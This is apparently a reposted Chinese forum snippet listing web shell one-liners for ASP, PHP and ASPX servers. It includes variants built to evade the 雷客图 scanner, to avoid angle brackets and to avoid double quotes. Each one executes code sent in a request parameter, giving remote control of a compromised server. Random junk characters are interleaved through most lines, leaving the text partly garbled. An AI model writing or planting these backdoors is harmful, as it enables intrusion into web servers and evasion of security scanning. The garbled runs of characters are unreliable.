asp一句话 <%execute(request("1"))%> " b0 e- |! z6 Z0 ]1 v! d0 Q& H; z
- M W% S) k! G; j$ ]" |
php一句话 <?php eval($_POST[1]);?> l6 ]: i7 g) J/ i# g
. j1 |- X* p) v n3 ^8 Daspx一句话
# O3 p5 _/ }; f% {' z2 z- @) Z9 H: d
<script language="C#" runat="server">4 L3 o, c% R& C( z
/ X; g4 ]) u4 e) w2 x6 [WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");
+ {( D4 V3 C5 X( C) y$ F6 P: @ Q3 H- x9 n# ?
</script>$ M% p4 C; F7 ^8 Y2 G
1 w5 _& r$ z; c' A6 Q0 C+ Z
可以躲过雷客图的一句话。$ G& W& ^, ~5 z, d1 Z+ ^1 I
7 W2 H$ {( h: I& g( ?. K
<%1 C2 Z" V9 d% f( N; L
5 O! \' `5 B0 E/ O7 A# w0 p/ @7 Y& w: } set ms = server.CreateObject("MSScriptControl.ScriptControl.1")! f9 Z/ w4 \! M( W# @" Y& w. t
$ s) ?. B1 I1 t* K( I ms.Language="VBScript"
: m9 w4 u: a* Q3 l9 k1 |9 K0 h" `' X# k+ h
ms.AddObject "Response", Response
7 h) Z9 Z0 C4 x7 O" X# N; F' P! v* g$ Y1 x; t
ms.AddObject "request", request
4 e# t1 v+ R c h) |6 O# {- a a6 G7 h' R) _: A
ms.ExecuteStatement("ev"&"al(request(""1""))")
* y% w( H/ c4 a. I2 d
8 K: n$ f% W$ `* a0 ?! f' E4 K: L %>
' B- g4 W) j4 J# A. H- C
( Y. z6 b) s! Q# C$ C1 Q7 [ 不用'<,>'的asp一句话 K$ s& R" _' @+ |. p. }3 T
6 g' s& f: J% `# k+ C <script language=VBScript runat=server>execute request("1")</script>/ _* C0 r/ B) I' I* q/ O
/ `' f- P% a4 U7 |) v2 G
不用双引号的一句话。
' d* T5 q, m4 `% f2 j/ G7 p B7 E$ _& [: j/ D% ^1 R, q
<%eval request(chr(35))%>" c4 U }2 {' c6 O; X
|